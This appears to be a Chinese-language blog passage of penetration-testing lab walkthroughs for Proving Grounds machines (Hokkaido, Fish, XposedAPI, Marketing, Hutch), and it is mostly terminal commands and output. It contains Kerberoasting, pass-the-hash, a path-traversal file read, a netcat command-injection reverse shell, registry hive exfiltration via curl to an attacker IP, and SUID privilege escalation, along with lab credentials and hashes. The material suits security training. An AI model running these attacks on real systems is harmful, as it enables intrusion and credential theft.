\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!' -M mssql_priv \nMSSQL       192.168.217.40  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)\nMSSQL       192.168.217.40  1433   DC               [+] hokkaido-aerospace.com\\discovery:Start123! \nMSSQL_PRIV  192.168.217.40  1433   DC               [*] HAERO\\discovery can impersonate: hrappdb-reader\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!' -M mssql_priv -o ACTION=privesc\nMSSQL       192.168.217.40  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)\nMSSQL       192.168.217.40  1433   DC               [+] hokkaido-aerospace.com\\discovery:Start123! \nMSSQL_PRIV  192.168.217.40  1433   DC               [*] HAERO\\discovery can impersonate: hrappdb-reader\nMSSQL_PRIV  192.168.217.40  1433   DC               [-] can't find any path to privesc\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ impacket-mssqlclient 'hokkaido-aerospace.com'\/'discovery':'Start123!'@'192.168.217.40' -windows-auth\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Encryption required, switching to TLS\n[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master\n[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english\n[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192\n[*] INFO(DC\\SQLEXPRESS): Line 1: Changed database context to 'master'.\n[*] INFO(DC\\SQLEXPRESS): Line 1: Changed language setting to us_english.\n[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) \n[!] Press help for extra shell commands\nSQL (HAERO\\discovery  guest@master)> enum_impersonate\nexecute as   database   permission_name   state_desc   grantee          grantor          \n----------   --------   ---------------   ----------   --------------   --------------   \nb'LOGIN'     b''        IMPERSONATE       GRANT        HAERO\\services   hrappdb-reader   \n\nSQL (HAERO\\discovery  guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader';\nSQL (hrappdb-reader  guest@master)> SELECT name FROM sys.databases;\nname      \n-------   \nmaster    \n\ntempdb    \n\nmodel     \n\nmsdb      \n\nhrappdb   \n\nSQL (hrappdb-reader  guest@master)> use hrappdb;\nENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb\nINFO(DC\\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.\nSQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT name FROM sys.tables;\nname      \n-------   \nsysauth   \n\nSQL (hrappdb-reader  hrappdb-reader@hrappdb)> select * from sysauth;\nid   name               password           \n--   ----------------   ----------------   \n 0   b'hrapp-service'   b'Untimed$Runny'   \n\nSQL (hrappdb-reader  hrappdb-reader@hrappdb)> <\/code><\/pre>\n\n\n\n
\u62ff\u5230 hrapp-service \u5c31\u6709\u4e86\u6574\u500b\u653b\u64ca\u601d\u8def<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u53d6\u5f97 Hazel.Green \u7684 Kerberoast hash \uff0c\u4e26\u7834\u89e3\u5f97\u5230\u5bc6\u78bc\u70ba haze1988<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ python3 ~\/tools\/AD\/targetedKerberoast\/targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' \n[*] Starting kerberoast attacks\n[*] Fetching usernames from Active Directory with LDAP\n[VERBOSE] SPN added successfully for (Hazel.Green)\n[+] Printing hash for (Hazel.Green)\n$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com\/Hazel.Green*$f2d19b90e90d2beb8c7d0dc14f2f916b$05bd0f3d4dc7582757d277b86ee24e1d7db4c63757f21349bd4f75920862f0c53c85720ad8327ba0d81004df628c6125ca10eafdf9d89154b1b64269b247833d3d7c994d2718f3d3a1fc9185d9ac47d0e6036d00185d3f92485ea0c0ab3ba9f22f04ecdbff1ac5eb5ac176689c710c7b9a3ef8bb9220ec4fbf1da2ffe2ac08aa6687cb1d3d9fdc71c99da2acb154fd6193577c142e23a6061c56e9fe5341a8618a9c78888d35676b0932ffd5f3fa96b4eb182e10e479c72e677cd57475ad5b3dc6324775c2b62ea462835ae91e662285f4ea9d9060dd8bf8b179245a700c5ecc237df5971ff0921ecbc203dc389f16f0275ff4a3a7491810b66578196ac545cc03407b32594373274fa68cfff72ade5a840f0031d9c5e153eb29cf1702b4aa37160d013f302d4708faee8ae10a144327419ca256b7e64aca328534ce995c62e079ae9c675d80a7c887d8ef2b113d54ba7cb4e6cf395e8a350cf896fc7429a81731fc91d41760ac451fedccac244e4d85f1388cf1e8ffc5471b3a27c081e649fe7bbbf841f0c926dae40ba8d7a9e918c7a526dad0363d7b96cc0c3709acd73c2b60ad93abcb70074977332e8847cb3a212770bd7dbcda929bc504512b8d2cadc8eb6fe917b1254f4b7a3b1acfd89341ef898127d73b402d6e3f58886c56c315c6b3fbdc244145384c7bc4d7e24c3fdecd0074b016e25d87a14e1a8a2f8f76e5c8c1f8be4ff71468903ca3c1c12a57b03db9d538399efa52966ded3b1f7f1c834462e10be473bf10a42a7ccd6da6705460dca4decb2780a9fc03d90a84a2971d882208fe015f4380a9a1d4ff4582bbe441431bbbb47c115075fc8086bb0898840ed96d118ad8f484171f53d112b469eb6287e7095e2bfa0d2c31ae0b1e4117affb389235a8ff9b2a204fb654544f1b263c6775c174a50c77bbd69240f7a068e704410ed7b869d97d2cca794340f74337c2442944dc48712a1bbf6654a94f248da97153938487fecb5b6a366c1163041b725359463d0a447bbde86b5e23e4f17f66bdd1beaabccf25bcdc43cd2aa1db8ff4bac8efd6a466c8188f4d00436df9e4d0eeda8f5d01d62dfb9e2445c5263fd3163e06dd8e6d9109777c667b1ff99b837b8cb2fc5ec73918131f53e9663c32423623e838b111a934b022fdaf36f6f8a34416ce5bf54894ad8397621b909f6c9a9bab5715d301786eb9f563db426897b9f5b4640d6e6fab1074287b6d5e2b1685f2a8d9f69a16ed07edd93c9e497f1c4b65767247d82d0493512fa30ebe4c1d7fc911f34fa3e44b36f89c7d51f85b58284f0c228f53d796b73c6b0b72ba9ce5f5df7cfe729696e4c9129eba8acbef117a2f5427931f6fe9bdc427c92468720f02ddc55d86e40789e983f4909be8bcc26820ebb624f1ab2a2f659f742f6655664a9eea2cfda6a0583f405e64064f79ad8915b0d95704a7a2b72b205f5fe13bb0f64829c75aa0c3a449fe7f7eb37f18c30f5548e88d6e3912d7ec39fa870575d37d97180761d13f2fb787763e4840762d056cb18ca4db141b2057cf854be0aa762e306f8fc2f09f0b7debd008b2a2e400d0b42883db9e30ff69f5998687e499f57ff187c30f736570b6c08ed743d54826ccdf26c05a8acf86333b36f1b70e\n[VERBOSE] SPN removed successfully for (Hazel.Green)<\/code><\/pre>\n\n\n\n
HAZEL.GREEN \u662f member of TIER2-ADMINS\uff0cTIER2-ADMINS \u5c0d MOLLY.SMITH \u6709 ForceChangePassword \u6b0a\u9650\uff0c\u76f4\u63a5\u4fee\u8a72 MOLLY.SMITH \u7684\u5bc6\u78bc <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ bloodyAD --host 192.168.217.40 -d hokkaido-aerospace.com -u Hazel.Green -p haze1988 set password MOLLY.SMITH pwn\n[+] Password changed successfully!<\/code><\/pre>\n\n\n\n
RDP \u9032\u53bb\u5f8c\u5c31\u62ff\u5230 local \u4e86<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Privilege Escalation<\/h3>\n\n\n\n
molly.smith \u5728 Tier1-Admins group<\/p>\n\n\n\n
PS C:\\Users\\MOLLY.SMITH> net user molly.smith\nUser name                    Molly.Smith\nFull Name                    Molly Smith\nComment\nUser's comment\nCountry\/region code          000 (System Default)\nAccount active               Yes\nAccount expires              Never\n\nPassword last set            7\/1\/2025 10:02:49 PM\nPassword expires             Never\nPassword changeable          7\/2\/2025 10:02:49 PM\nPassword required            No\nUser may change password     Yes\n\nWorkstations allowed         All\nLogon script\nUser profile\nHome directory\nLast logon                   7\/1\/2025 10:25:46 PM\n\nLogon hours allowed          All\n\nLocal Group Memberships\nGlobal Group memberships     *Domain Users         *Tier1-Admins\n                             *it\nThe command completed successfully.<\/code><\/pre>\n\n\n\n
run as administrator \u7684\u65b9\u5f0f\u6253\u958b powershell \uff0c\u67e5\u770b molly.smith \u64c1\u6709\u7684\u5b8c\u6574\u6b0a\u9650<\/p>\n\n\n\n
PS C:\\Windows\\system32> whoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                         State\n============================= =================================== ========\nSeMachineAccountPrivilege     Add workstations to domain          Disabled\nSeSystemtimePrivilege         Change the system time              Disabled\nSeBackupPrivilege             Back up files and directories       Disabled\nSeRestorePrivilege            Restore files and directories       Disabled\nSeShutdownPrivilege           Shut down the system                Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking            Enabled\nSeRemoteShutdownPrivilege     Force shutdown from a remote system Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set      Disabled\nSeTimeZonePrivilege           Change the time zone                Disabled<\/code><\/pre>\n\n\n\n
\u8f49\u5b58 SAM system<\/p>\n\n\n\n
PS C:\\Users\\MOLLY.SMITH> reg save hklm\\sam sam\nThe operation completed successfully.\nPS C:\\Users\\MOLLY.SMITH> reg save hklm\\system system\nThe operation completed successfully.\nPS C:\\Users\\MOLLY.SMITH> curl.exe -F files=@sam http:\/\/192.168.45.181:8000\/upload\nPS C:\\Users\\MOLLY.SMITH> curl.exe -F files=@system http:\/\/192.168.45.181:8000\/upload\nPS C:\\Users\\MOLLY.SMITH><\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ impacket-secretsdump -sam sam -system system LOCAL                                                          \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n[*] Cleaning up... <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ evil-winrm -u 'Administrator' -H 'd752482897d54e239376fddb2a2109e4' -i '192.168.217.40'\n                                        \nEvil-WinRM shell v3.7\n                                        \nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                                                          \n                                        \nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n                                        \nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ..\n*Evil-WinRM* PS C:\\Users\\Administrator> type desktop\\proof.txt\ne13b02f4b6ace5c8233b9513886d5c85\n*Evil-WinRM* PS C:\\Users\\Administrator> <\/code><\/pre>\n\n\n\n
Fish<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.217.168<\/strong><\/strong><\/strong><\/td>TCP:135,139,445,3389,3370,4848,5040,6060,7676,7776,8080,8181,8686<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u5728 4848 port \u8dd1\u8457\u6709 Arbitrary File Read vuln \u7684 service\uff0c6060 port \u8dd1 synaman 5.1<\/p>\n\n\n\n
Initial Access<\/strong><\/h3>\n\n\n\n
\u67e5\u8a62\u5f97\u77e5 synaman \u7684\u5e33\u5bc6\u6587\u4ef6\u4f4d\u65bc C:\\SynaMan\\config<\/em> \u8cc7\u6599\u593e\u5167\uff0c\u900f\u904e\u53e6\u4e00\u500b service  Arbitrary File Read vuln \u627e\u5230\u5e33\u5bc6<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Fish]\n\u2514\u2500$ curl \"http:\/\/192.168.217.168:4848\/theme\/META-INF\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/%c0%ae%c0%ae\/SynaMan\/config\/AppConfig.xml\" \n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Configuration>\n        <parameters>\n                <parameter name=\"adminEmail\" type=\"1\" value=\"admin@fish.pg\"><\/parameter>\n                <parameter name=\"smtpSecurity\" type=\"1\" value=\"None\"><\/parameter>\n                <parameter name=\"jvmPath\" type=\"1\" value=\"jre\/bin\/java\"><\/parameter>\n                <parameter name=\"userHomeRoot\" type=\"1\" value=\"C:\\ProgramData\\SynaManHome\"><\/parameter>\n                <parameter name=\"httpPortSSL\" type=\"2\" value=\"-1\"><\/parameter>\n                <parameter name=\"httpPort\" type=\"2\" value=\"0\"><\/parameter>\n                <parameter name=\"vmParams\" type=\"1\" value=\"-Xmx128m -DLoggingConfigFile=logconfig.xml\"><\/parameter>\n                <parameter name=\"synametricsUrl\" type=\"1\" value=\"http:\/\/synametrics.com\/SynametricsWebApp\/\"><\/parameter>\n                <parameter name=\"lastSelectedTab\" type=\"1\" value=\"1\"><\/parameter>\n                <parameter name=\"emailServerWebServicePort\" type=\"2\" value=\"\"><\/parameter>\n                <parameter name=\"imagePath\" type=\"1\" value=\"images\/\"><\/parameter>\n                <parameter name=\"defaultOperation\" type=\"1\" value=\"frontPage\"><\/parameter>\n                <parameter name=\"publicIPForUrl\" type=\"1\" value=\"\"><\/parameter>\n                <parameter name=\"flags\" type=\"2\" value=\"2\"><\/parameter>\n                <parameter name=\"httpPort2\" type=\"2\" value=\"6060\"><\/parameter>\n                <parameter name=\"useUPnP\" type=\"4\" value=\"true\"><\/parameter>\n                <parameter name=\"smtpServer\" type=\"1\" value=\"mail.fish.pg\"><\/parameter>\n                <parameter name=\"smtpUser\" type=\"1\" value=\"arthur\"><\/parameter>\n                <parameter name=\"InitialSetupComplete\" type=\"4\" value=\"true\"><\/parameter>\n                <parameter name=\"disableCsrfPrevention\" type=\"4\" value=\"true\"><\/parameter>\n                <parameter name=\"failureOverHttpPort\" type=\"2\" value=\"55222\"><\/parameter>\n                <parameter name=\"smtpPort\" type=\"2\" value=\"25\"><\/parameter>\n                <parameter name=\"httpIP\" type=\"1\" value=\"\"><\/parameter>\n                <parameter name=\"emailServerWebServiceHost\" type=\"1\" value=\"\"><\/parameter>\n                <parameter name=\"smtpPassword\" type=\"1\" value=\"KingOfAtlantis\"><\/parameter>\n                <parameter name=\"ntServiceCommand\" type=\"1\" value=\"net start SynaMan\"><\/parameter>\n                <parameter name=\"mimicHtmlFiles\" type=\"4\" value=\"false\"><\/parameter>\n        <\/parameters>\n<\/Configuration> <\/code><\/pre>\n\n\n\n
RDP \u9032\u53bb<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Privilege Escalation<\/h3>\n\n\n\n
powerup \u6aa2\u67e5<\/p>\n\n\n\n
ServiceName                     : domain1\nPath                            : C:\\glassfish4\\glassfish\\domains\\domain1\\bin\\domain1Service.exe\nModifiableFile                  : C:\\glassfish4\\glassfish\\domains\\domain1\\bin\\domain1Service.exe\nModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}\nModifiableFileIdentityReference : NT AUTHORITY\\Authenticated Users\nStartName                       : LocalSystem\nAbuseFunction                   : Install-ServiceBinary -Name 'domain1'\nCanRestart                      : False\nName                            : domain1\nCheck                           : Modifiable Service Files<\/code><\/pre>\n\n\n\n
\u518d\u6b21\u78ba\u8a8d\u6709\u6b0a\u9650\u5beb\u5165\u4e26\u5229\u7528<\/p>\n\n\n\n
PS C:\\Users\\arthur> whoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                          State\n============================= ==================================== ========\nSeShutdownPrivilege           Shut down the system                 Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking             Enabled\nSeUndockPrivilege             Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set       Disabled\nSeTimeZonePrivilege           Change the time zone                 Disabled\nPS C:\\Users\\arthur> icacls C:\\glassfish4\\glassfish\\domains\\domain1\\bin\\domain1Service.exe\nC:\\glassfish4\\glassfish\\domains\\domain1\\bin\\domain1Service.exe BUILTIN\\Administrators:(I)(F)\n                                                               NT AUTHORITY\\SYSTEM:(I)(F)\n                                                               BUILTIN\\Users:(I)(RX)\n                                                               NT AUTHORITY\\Authenticated Users:(I)(M)\n\nSuccessfully processed 1 files; Failed processing 0 files\nPS C:\\Users\\arthur> mv C:\\glassfish4\\glassfish\\domains\\domain1\\bin\\domain1Service.exe C:\\glassfish4\\glassfish\\domains\\domain1\\bin\\domain1Service.exe.bak\nPS C:\\Users\\arthur> cp \/\/192.168.45.181\/share\/pwn.exe C:\\glassfish4\\glassfish\\domains\\domain1\\bin\\domain1Service.exe\nPS C:\\Users\\arthur><\/code><\/pre>\n\n\n\n
\u91cd\u555f\u96fb\u8166\u5f8c\u6536\u5230 revshell <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Fish]\n\u2514\u2500$ rlwrap nc -lvnp 6969\nlistening on [any] 6969 ...\nconnect to [192.168.45.181] from (UNKNOWN) [192.168.217.168] 49668\nMicrosoft Windows [Version 10.0.19042.1288]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\WINDOWS\\system32>whoami\nwhoami\nnt authority\\system\n\nC:\\WINDOWS\\system32><\/code><\/pre>\n\n\n\n
Xposedapi<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.104.134<\/strong><\/strong><\/strong><\/td>TCP:22,13337<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/h3>\n\n\n\n
13337 port \u904b\u884c web service \uff0c\u5728\u8a2a\u554f \/logs \uff0c\u986f\u793a Access Denied for this Host.\uff0c\u4fee\u8a72 x-forwarded-for: localhost \uff0c\u6210\u529f\u7e5e\u904e\u3002\u986f\u793a GET file \uff0c\u9019\u500b\u53c3\u6578\u6709 Path Traversal\uff0c\u53ef\u4ee5\u8b80\u53d6 \/etc\/passwd\uff0c\u900f\u904e \/logs?file=main.py \uff0c\u8b80\u53d6\u5230\u7db2\u7ad9 source code<\/p>\n\n\n\n
\u6574\u7406\u5982\u4e0b<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\nfrom flask import Flask, jsonify, request, render_template, Response\nfrom Crypto.Hash import MD5\nimport json, os, binascii\n\napp = Flask(__name__)\n\n@app.route('\/')\ndef home():\n    return render_template(\"home.html\")\n\n@app.route('\/update', methods=[\"POST\"])\ndef update():\n    if request.headers['Content-Type'] != \"application\/json\":\n        return \"Invalid content type.\"\n    else:\n        data = json.loads(request.data)\n        if data['user'] != \"clumsyadmin\":\n            return \"Invalid username.\"\n        else:\n            os.system(\"curl {} -o \/home\/clumsyadmin\/app\".format(data['url']))\n            return \"Update requested by {}. Restart the software for changes to take effect.\".format(data['user'])\n\n@app.route('\/logs')\ndef readlogs():\n    if request.headers.getlist(\"X-Forwarded-For\"):\n        ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n    else:\n        ip = \"1.3.3.7\"\n\n    if ip == \"localhost\" or ip == \"127.0.0.1\":\n        if request.args.get(\"file\") is None:\n            return \"Error! No file specified. Use file=\/path\/to\/log\/file to access log files.\", 404\n        else:\n            with open(request.args.get(\"file\"), 'r') as f:\n                data = f.read()\n            return render_template(\"logs.html\", data=data)\n    else:\n        return \"WAF: Access Denied for this Host.\", 403\n\n@app.route('\/version')\ndef version():\n    hasher = MD5.new()\n    with open(\"\/home\/clumsyadmin\/app\", 'rb') as f:\n        d = f.read()\n        hasher.update(d)\n        appHash = binascii.hexlify(hasher.digest()).decode()\n    return \"1.0.0b{}\".format(appHash)\n\n@app.route('\/restart', methods=[\"GET\", \"POST\"])\ndef restart():\n    if request.method == \"GET\":\n        return render_template(\"restart.html\")\n    else:\n        os.system(\"killall app\")\n        os.system(\"bash -c '\/home\/clumsyadmin\/app&'\")\n        return \"Restart Successful.\"<\/code><\/pre>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u5728 \/update \u53ef\u4ee5 command injection \uff0c\u4e26\u4e14\u6e2c\u8a66\u53ef\u884c<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/XposedAPI]\n\u2514\u2500$ curl -X POST http:\/\/192.168.104.134:13337\/update \\\n-H \"Content-Type: application\/json\" \\\n-d '{\"user\": \"clumsyadmin\", \"url\": \";ping -c 4 192.168.45.243;\"}'\nUpdate requested by clumsyadmin. Restart the software for changes to take effect.   \n---\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo tcpdump -i tun0 icmp\n[sudo] password for kali: \ntcpdump: verbose output suppressed, use -v[v]... for full protocol decode\nlistening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes\n22:57:03.054524 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 1, length 64\n22:57:03.056629 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 1, length 64\n22:57:04.057069 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 2, length 64\n22:57:04.057091 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 2, length 64\n22:57:05.058390 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 3, length 64\n22:57:05.058406 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 3, length 64\n22:57:06.059865 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 4, length 64\n22:57:06.059881 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 4, length 64<\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ curl -X POST http:\/\/192.168.104.134:13337\/update \\\n-H \"Content-Type: application\/json\" \\\n-d '{\"user\": \"clumsyadmin\", \"url\": \";busybox nc 192.168.45.243 4444 -e bash;\"}' \n---\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/XposedAPI]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.243] from (UNKNOWN) [192.168.104.134] 55626\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\nclumsyadmin@xposedapi:~\/webapp$ cd ~\ncd ~\nclumsyadmin@xposedapi:~$ ls\nls\napp  local.txt  webapp\nclumsyadmin@xposedapi:~$ cat local.txt\ncat local.txt\nd302915ee9a68152e245ced494ccea3a\nclumsyadmin@xposedapi:~$ <\/code><\/pre>\n\n\n\n
Privilege Escalation – SUID<\/h3>\n\n\n\n
clumsyadmin@xposedapi:~$ TF=$(mktemp)\nchmod +x $TF\nTF=$(mktemp)\nclumsyadmin@xposedapi:~$ chmod +x $TF\nclumsyadmin@xposedapi:~$ echo -e '#!\/bin\/bash -p\\n\/bin\/bash -p 1>&0' >$TF\necho -e '#!\/bin\/bash -p\\n\/bin\/bash -p 1>&0' >$TF\nclumsyadmin@xposedapi:~$ \/usr\/bin\/wget --use-askpass=$TF 0\n\/usr\/bin\/wget --use-askpass=$TF 0\nbash-5.0# id\nid\nuid=1000(clumsyadmin) gid=1000(clumsyadmin) euid=0(root) groups=1000(clumsyadmin)\nbash-5.0# cat \/root\/proof.txt\ncat \/root\/proof.txt\n33a3dd42641cc13beb1942c9e8d449bd\nbash-5.0# <\/code><\/pre>\n\n\n\n
Marketing<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.200.225<\/strong><\/strong><\/strong><\/td>TCP:22,80<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u679a\u8209\u5230 \/old\/ \u76ee\u9304\uff0c\u9032\u884c\u9023\u7d50\u6bd4\u8f03\u5f8c\u767c\u73fe \/old \u591a\u4e00\u500b<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Marketing]\n\u2514\u2500$ curl http:\/\/192.168.200.225\/ | grep -Eo '([a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}|[0-9]{1,3}(\\.[0-9]{1,3}){3})' | sort -u | wc -l\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100 18286  100 18286    0     0  86508      0 --:--:-- --:--:-- --:--:-- 86254\n37\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Marketing]\n\u2514\u2500$ curl http:\/\/192.168.200.225\/old\/ | grep -Eo '([a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}|[0-9]{1,3}(\\.[0-9]{1,3}){3})' | sort -u | wc -l\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100 20423  100 20423    0     0  95506      0 --:--:-- --:--:-- --:--:-- 95434\n38<\/code><\/pre>\n\n\n\n
\u6bd4\u8f03\u5f8c\u767c\u73fe\u591a\u51fa\u4e00\u500b customers-survey.marketing.pg \u628a\u5b83\u52a0\u9032\u53bb \/etc\/hosts<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ echo \"192.168.200.225 customers-survey.marketing.pg\" | sudo tee -a \/etc\/hosts\n[sudo] password for kali: \n192.168.200.225 customers-survey.marketing.pg<\/code><\/pre>\n\n\n\n
\u8a72\u7db2\u7ad9\u904b\u884c LimeSurvey \u6709 auth RCE<\/p>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u4f7f\u7528 exploit<\/a> \uff0c\u5b8c\u6210\u4e00\u90e8\u5206\uff0c\u6309\u7167\u5831\u932f\u7684\u90e8\u5206\u624b\u52d5\u5b8c\u6210\u62ff\u5230 www-data\uff0c\u627e\u5230 mysql \u9023\u7dda\u5bc6\u78bc<\/p>\n\n\n\n
www-data@marketing:\/var\/www\/LimeSurvey\/application\/config$ cat config.php\ncat config.php\n<?php if (!defined('BASEPATH')) exit('No direct script access allowed');\n\/*\n| -------------------------------------------------------------------\n| DATABASE CONNECTIVITY SETTINGS\n| -------------------------------------------------------------------\n| This file will contain the settings needed to access your database.\n|\n| For complete instructions please consult the 'Database Connection'\n| page of the User Guide.\n|\n| -------------------------------------------------------------------\n| EXPLANATION OF VARIABLES\n| -------------------------------------------------------------------\n|\n|    'connectionString' Hostname, database, port and database type for \n|     the connection. Driver example: mysql. Currently supported:\n|                 mysql, pgsql, mssql, sqlite, oci\n|    'username' The username used to connect to the database\n|    'password' The password used to connect to the database\n|    'tablePrefix' You can add an optional prefix, which will be added\n|                 to the table name when using the Active Record class\n|\n*\/\nreturn array(\n  'components' => array(\n   'db' => array(\n    'connectionString' => 'mysql:host=localhost;port=3306;dbname=limesurvey;',\n    'emulatePrepare' => true,\n    'username' => 'limesurvey_user',\n    'password' => 'EzPwz2022_dev1$$23!!',\n    'charset' => 'utf8mb4',\n    'tablePrefix' => 'lime_',\n   ),<\/code><\/pre>\n\n\n\n
\u5617\u8a66\u7528 t.miller\/EzPwz2022_dev1$$23!! SSH \u767b\u5165\u6210\u529f<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
t.miller@marketing:~$ cat \n.bash_history  .bash_logout   .bashrc        .cache\/        local.txt      .profile       \nt.miller@marketing:~$ cat local.txt \nb31310e9f2a5b0888c2ea2e83cd35ab3\nt.miller@marketing:~<\/code><\/pre>\n\n\n\n
Hutch<\/strong><\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.206.122<\/strong><\/strong><\/strong><\/strong><\/td>TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
ldap enum<\/strong><\/p>\n\n\n\n
\u7528 ldapsearch \u5728\u5176\u4e2d\u7684 description \u627e\u5230\u5bc6\u78bc CrabSharkJellyfish192 \u5c0d\u61c9\u5230 user fmcsorley<\/p>\n\n\n\n
